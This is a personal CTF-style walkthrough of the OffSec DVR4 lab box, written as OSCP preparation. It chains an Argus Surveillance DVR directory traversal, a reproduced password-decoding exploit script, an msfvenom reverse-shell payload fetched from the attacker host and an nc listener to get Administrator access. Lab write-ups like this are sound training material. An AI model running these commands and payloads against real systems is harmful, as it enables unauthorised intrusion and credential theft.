OffSec Proving Grounds: DVR4 - Walkthrough

This post contains rough notes explaining my process for exploiting the Hetemit Proving Grounds box while preparing for the OSCP certification.

My Process

Firstly I performed a port scan with nmap:

  sudo nmap -p- -T4 -A -sS -v --open -oA nmap 192.168.236.179
Nmap scan report for 192.168.236.179
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
|   3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_  384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
8080/tcp open  http-proxy
|_http-favicon: Unknown favicon MD5: 283B772C1C2427B56FC3296B0AF42F7C
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
|_http-title: Argus Surveillance DVR
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Connection: Keep-Alive
|     Keep-Alive: timeout=15, max=4
|     Content-Type: text/html
|     Content-Length: 985
|     <HTML>
|     <HEAD>
|     <TITLE>
|     Argus Surveillance DVR
|     </TITLE>
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
|     <frameset frameborder="no" border="0" rows="75,*,88">
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0">
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0">
|     <noframes>
|     <p>This page uses frames, but your browser doesn't support them.</p>
|_    </noframes>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94%I=7%D=9/3%Time=64F418A3%P=x86_64-pc-linux-gnu%r(Get
SF:Request,451,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20Keep-Alive\r\nKee
SF:p-Alive:\x20timeout=15,\x20max=4\r\nContent-Type:\x20text/html\r\nConte
SF:nt-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r\n<TITLE>\r\nArgus\x20Survei
SF:llance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20http-equiv=\"Content-Type\"\x
SF:20content=\"text/html;\x20charset=ISO-8859-1\">\r\n<meta\x20name=\"GENE
SF:RATOR\"\x20content=\"Actual\x20Drawing\x206\.0\x20\(http://www\.pysoft\
SF:.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<frameset\x20frameborder=\"no\"\x20b
SF:order=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x20<frame\x20name=\"Top\"\x20
SF:frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasTop
SF:Frame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r\n\x
SF:20\x20<frame\x20name=\"ActiveXFrame\"\x20frameborder=\"0\"\x20scrolling
SF:=\"auto\"\x20noresize\x20src=\"ActiveXIFrame\.html\"\x20marginwidth=\"0
SF:\"\x20marginheight=\"0\">\r\n\x20\x20<frame\x20name=\"CamerasTable\"\x2
SF:0frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasBo
SF:ttomFrame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r
SF:\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>This\x20page\x20uses\x20fram
SF:es,\x20but\x20your\x20browser\x20doesn't\x20support\x20them\.</p>\r\n\x
SF:20\x20</noframes>\r")%r(HTTPOptions,451,"HTTP/1\.1\x20200\x20OK\r\nConn
SF:ection:\x20Keep-Alive\r\nKeep-Alive:\x20timeout=15,\x20max=4\r\nContent
SF:-Type:\x20text/html\r\nContent-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r
SF:\n<TITLE>\r\nArgus\x20Surveillance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20h
SF:ttp-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=ISO-8859-
SF:1\">\r\n<meta\x20name=\"GENERATOR\"\x20content=\"Actual\x20Drawing\x206
SF:\.0\x20\(http://www\.pysoft\.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<framese
SF:t\x20frameborder=\"no\"\x20border=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x
SF:20<frame\x20name=\"Top\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x20
SF:noresize\x20src=\"CamerasTopFrame\.html\"\x20marginwidth=\"0\"\x20margi
SF:nheight=\"0\">\x20\x20\r\n\x20\x20<frame\x20name=\"ActiveXFrame\"\x20fr
SF:ameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"ActiveXIFram
SF:e\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\r\n\x20\x20<frame
SF:\x20name=\"CamerasTable\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x2
SF:0noresize\x20src=\"CamerasBottomFrame\.html\"\x20marginwidth=\"0\"\x20m
SF:arginheight=\"0\">\x20\x20\r\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>
SF:This\x20page\x20uses\x20frames,\x20but\x20your\x20browser\x20doesn't\x2
SF:0support\x20them\.</p>\r\n\x20\x20</noframes>\r");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   204.71 ms 192.168.45.1
2   204.66 ms 192.168.45.254
3   206.66 ms 192.168.251.1
4   207.00 ms 192.168.236.179

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep  3 17:25:53 2023 -- 1 IP address (1 host up) scanned in 279.63 seconds
  expand
expand
Bash

I browsed to port 8080 in my browser:

I browsed the web app, and found that the users page showed there were users called Administrator and viewer.

I did some research on Argus Surveillance and found multiple exploits on exploitdb.
The first interesting one was the directory traversal vulnerability discussed in this file here as it is an unauthenticated exploit.
Another intersting exploit was this one here which decodes the weak encoding that Argus Surveillance uses to encode users passwords. This exploit states that the Argus Surveillance passwords are stored in the location: C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

An idea I had was to chain these two exploits together, and use the directory traversal to read the Argus Surveillance encoded passwords and then the other exploit to decode them.

So I first tested if the directory traversal shown in the exploit worked and it did. I then used the directory traversal to read the configuration file:

But unfortunately there were no passwords shown there.

The machine had the ssh port open so I then tried to access users ssh keys. For the users I tried using the users I found earlier while browsing the web app. When testing for the viewer user I got access to that users ssh key:

I then saved the key to a file and used the chmod 600 command to give it the right permissions to use with ssh.
I tried to connect with ssh but couldnt connect due to tmux’s custom $TERM environment variable not being recognised by the remote machine. So I simply overwrote the environment variable with xterm-256color and then I could connect.

  ssh viewer@192.168.202.179 -i viewer.ssh
Terminal initialization failure. See server logs for more info.
Hint: Try requesting a different terminal environment.
Connection to 192.168.202.179 closed.

TERM=xterm-256color

ssh viewer@192.168.202.179 -i viewer.ssh
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>
Bash

The viewer user had the SeShutdownPrivilege permission which I noted, as it would be useful if I found a service to exploit.

  C:\Users\viewer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
Bash

When I had been searching for exploits on Argus Surveillance at the initial enumeration phase I saw the exploit here which says that the Argus Surveillance DVR Watchdog service at location C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe has an unquoted service path.

So then I checked to see if I had write permissions in C:\ or C:\Program Files.

  PS C:\Program Files> icacls C:\
C:\ BUILTIN\Administrators:(OI)(CI)(F)
    NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(RX)
    NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
    NT AUTHORITY\Authenticated Users:(AD)
    Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

Successfully processed 1 files; Failed processing 0 files
PS C:\Program Files> icacls C:\"Program Files"
C:\Program Files NT SERVICE\TrustedInstaller:(F)
                 NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(M)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 BUILTIN\Administrators:(M)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 BUILTIN\Users:(RX)
                 BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                 CREATOR OWNER:(OI)(CI)(IO)(F)
                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
Bash

Unfortunately I didnt so exploiting this wasnt going to work.

There is another exploit on exploit db here that requires creating a DLL and putting it in the service directory but again this would require write permissions in the service directory which I did not have.

I then did more enumeration of the file system and returned to the C:\ProgramData\PY_Software\Argus Surveillance DVR directory to check out the DVRParams.ini configuration file:

  C:\ProgramData\PY_Software\Argus Surveillance DVR>type DVRParams.ini
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DialUpUseDefaults=1
DialUpUserName=
DialUpPassword=
DialUpDomain=
DialUpPhone=
ConnectCameraAtStartup=1
ConnectSessionFile=Argus Surveillance DVR.DVRSes
StartAsService=1
RunPreviewAtStartup=1
FullScreenAtStartup=0
GalleryFolder=C:\ProgramData\PY_Software\Argus Surveillance DVR\Gallery\
RecordEncryptionPassword=
RecordFrameInterval=200
RecordMaxFileSize=0
RecordEncryption=0
RecordAllTime=0
RecordSound=1
RecordMotion=1
RecordCamName=1
RecordCamLocation=1
RecordCamDescript=1
HTTP_AlwaysActive=1
HTTP_Port=8080
HTTP_Interval=100
HTTP_LimitViewers=0
HTTP_NeedAuthorization=0
HTTP_NeedLocalAuthorization=0
HTTP_MaxNumberOfViewers=100
HTTP_AudioEnabled=1
HTTP_StreamEnabled=1
HTTP_EncriptionType=0
HTTP_VideoBitRate=204800
HTTP_DisconnectInactiveUsers=0
HTTP_MaxInactivityTime=0
HTTP_MaxConnectionMinutes=0
HTTP_ReconnectAgain=0
WriteHTTPLog=1
WriteMotionLog=1
WriteEventsLog=1
LimitMaxSizeOfLogFile=1
MaxSizeOfLogFile=10000
UseRedirect=1
UseWebMonitoring=0
PYSoftAccountEmail=
PYSoftAccountPsw=
AskLoginAtStartup=0
TaskTrayPassword=
StealthMode=0
AskForConfirmationOnExit=0
Watchdog_PollingIntrvl=20
Watchdog_RestartProgramPolls=20
Watchdog_Reboot=0
Watchdog_RebootTries=20
Watchdog_RebootPeriodically=1
Watchdog_RebootPeriodclType=1
Watchdog_RebootInterval=1
Watchdog_Hours=24
Watchdog_Days=1
Watchdog_DayOfWeek=0
Watchdog_Month=1
Watchdog_RebootIfCPU=0
Watchdog_RebootIfCPUType=0
Watchdog_CPU=98
Watchdog_RebootIfCPUPolls=20
Watchdog_IsRemoteAccess=0
Watchdog_AccessPort=10000
Watchdog_AccessID=
Watchdog_AccessPsw=
DynIPNextConnectTime0=0
DynIPNextConnectTime1=0
MonitorNextConnectTime0=0
MonitorNextConnectTime1=0
SMSNextConnectTime0=0
SMSNextConnectTime1=0
UseScreenSaver=0
ScreenSaveTimeOut=5
MaxFileSize=2048
StreamToWeb=0
WebPageBackColor=16767949
WebPageTextColor=0
WebPageLinkColor=0
WebPageActiveLnkColor=0
WebPageVisitedLnkColor=0
WebPageActiveXColor=0
PreviewByOCX=1
ReduceCPUUsage=1
MaximumCPUUsage=95
ActionsAllTime=0
DetectMotion=0
DetectionInterval=500
MotionDetectionDelay=1000
DifferencesThreshold=5
MotionDifSensitivity=0
MotionDontTriggerIfMuch=0
MotionDontTriggerTrshld=90
MotionSensitivityCnst=90
MotionSensitivity1=30
MotionSensitivity2=21
MotionSensitivity3=17
MotionSensitivity4=15
MotionSensitivity5=15
MotionSensitivity6=17
MotionSensitivity7=21
MotionSensitivity8=30
MotionMinActionDuration=2000
MotionSendEmail=0
EmailUsePysoftMailServer=0
MotionEmailServer=
MotionEmailNeedPassword=0
MotionEmailAccountName=
MotionEmailPassword=
MotionEmailSMTPPort=25
MotionEmailSender=
MotionEmailAddress=
MotionEmailSubject=4D6F74696F6E207B4D4F54494F4E7D2520686173206265656E206465746563746564212121
MotionEmailMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E2074686520776
1746368656420617265612E
MotionEmailInterval=20
MotionEmailAttachImage=1
MotionEmailNumberOfImages=3
MotionEmailPriority=1
FacesDetect=0
FacesHighlight=1
FaceDetectSensitivityInPercents=50
FaceDetecMinFaceInPercents=10
MotionPlaySound=0
MotionSoundFile=
MotionLanchApplication=0
MotionApplicationFile=
MotionRecordVideo=0
MotionVideoDuration=120
MotionPreVideoDuration=2
MotionWriteSnapshots=0
MotionSnapshotDuration=10
MotionChangeSettings=0
MotionImageQuality=70
MotionSoundQuality=70
MotionRecordInterval=133
MotionChangeSettingsDuration=10
MotionDrawMotionValue=0
MotionHighlightMoving=0
SendSMS=0
SMSSender=
SMSPhone=
SMSMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E207468652077617463686
56420617265612E
RemoveObsoleteFiles=1
DaysToDeleteObsoleteFiles=7
LastReadNetCamsListDay=45173

[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
FullName0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF641
4D7BB740CA79F6419083
FullControl0=1
CanClose0=1
CanPlayback0=1
CanPTZ0=1
CanRecord0=1
CanConnect0=1
CanReceiveAlerts0=1
CanViewLogs0=1
CanViewCamerasNumber0=0
CannotBeRemoved0=1
MaxConnectionTimeInMins0=0
DailyTimeLimitInMins0=0
MonthlyTimeLimitInMins0=0
DailyTrafficLimitInKB0=0
MonthlyTrafficLimitInKB0=0
MaxStreams0=0
MaxViewers0=0
MaximumBitrateInKb0=0
AccessFromIPsOnly0=
AccessRestrictedForIPs0=
MaxBytesSent0=0
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Description0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF
6414D7BB740CA79F6419083
Disabled0=0
ExpirationDate0=0
Organization0=
OrganizationUnit0=
Phone10=
Phone20=
Fax0=
Email0=
Position0=
Address10=
Address20=
City0=
StateProvince0=
ZipPostalCode0=
Country0=
ComputerID0=
TrialAccount0=0
UserID1=576846
LoginName1=Viewer
FullName1=
FullControl1=1
CanClose1=1
CanPlayback1=1
CanPTZ1=1
CanRecord1=1
CanConnect1=1
CanReceiveAlerts1=1
CanViewLogs1=1
CanViewCamerasNumber1=0
CannotBeRemoved1=0
MaxConnectionTimeInMins1=0
DailyTimeLimitInMins1=0
MonthlyTimeLimitInMins1=0
DailyTrafficLimitInKB1=0
MonthlyTrafficLimitInKB1=0
MaxStreams1=0
MaxViewers1=0
MaximumBitrateInKb1=0
AccessFromIPsOnly1=
AccessRestrictedForIPs1=
MaxBytesSent1=0
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
Description1=
Disabled1=0
ExpirationDate1=0
Organization1=
OrganizationUnit1=
Phone11=
Phone21=
Fax1=
Email1=
Position1=
Address11=
Address21=
City1=
StateProvince1=
ZipPostalCode1=
Country1=
ComputerID1=
TrialAccount1=0
  expand
expand
Bash

This file had lots more information in it than when I accessed it from the directory traversal vulnerability, which I have no idea why didnt show up back then.

From the file I gathered the encoded passwords from the Administrator and viewer users:
Administrator: Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Viewer: Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

Below is the python script from the exploit from exploitdb that decodes the encoded passwords. I made a minor change to make the password get printed out on a single line.

# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack

# Note: Argus Surveillance DVR 4.0 configuration is present in
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

# I'm too lazy to add special characters :P
characters = {
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'}

# ASCII art is important xD
banner = '''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
'''
print(banner)

# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
if (len(pass_hash)%4) != 0:
	print("[!] Error, check your password hash")
	exit()
split = []
n = 4
for index in range(0, len(pass_hash), n):
	split.append(pass_hash[index : index + n])

for key in split:
	if key in characters.keys():
		print(characters[key], end="")
	else:
		print("[-] " + key + ":Unknown")
Python

Using it to decode both of the passwords:

  python3 50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

14WatchD0g[-] D9A8:Unknown
python3 50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

ImWatchingY0u
Bash

The last char of the Administrator password could not be converted by the python script. So I checked the python script to see what characters it was missing from its dictionary mapping. The script was missing all symbols other than !, so it must be one of them that is the last char in the Administrator password.

I then transfered the Invoke-Runas.ps1 script to the windows machine and dot sourced it.

  PS C:\Users\viewer> iwr -uri http://192.168.45.229/Invoke-Runas.ps1 -outfile Invoke-Runas.ps1
PS C:\Users\viewer> . .\Invoke-Runas.ps1
Bash

I created a msfvenom windows exe reverse shell binary and transferred it to the windows machine:

  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.229 LPORT=80 -f exe -o met80.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: met80.exe
Bash
  PS C:\Users\viewer> iwr -uri http://192.168.45.229/met80.exe -outfile met80.exe
Bash

Finally I used the Invoke-Runas.ps1 script to execute the msfvenom reverse shell binary as the Administrator user. Since I did not know the last character of the password but new it must be a symbol, I iterated over the symbol chars.

  PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g@  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[!] Mmm, something went wrong! GetLastError returned:
==> The system could not find the environment option that was entered

PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g#  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[!] Mmm, something went wrong! GetLastError returned:
==> The system could not find the environment option that was entered

PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g$  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[+] Success, process details:

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     34       3      528       2480       0.00   3816   0 met80
Bash

The password with $ at the end worked and the binary was executed.

I then received a shell on my nc listener as the Administrator user:

  rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.229] from (UNKNOWN) [192.168.202.179] 50493
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami
whoami
dvr4\administrator
Bash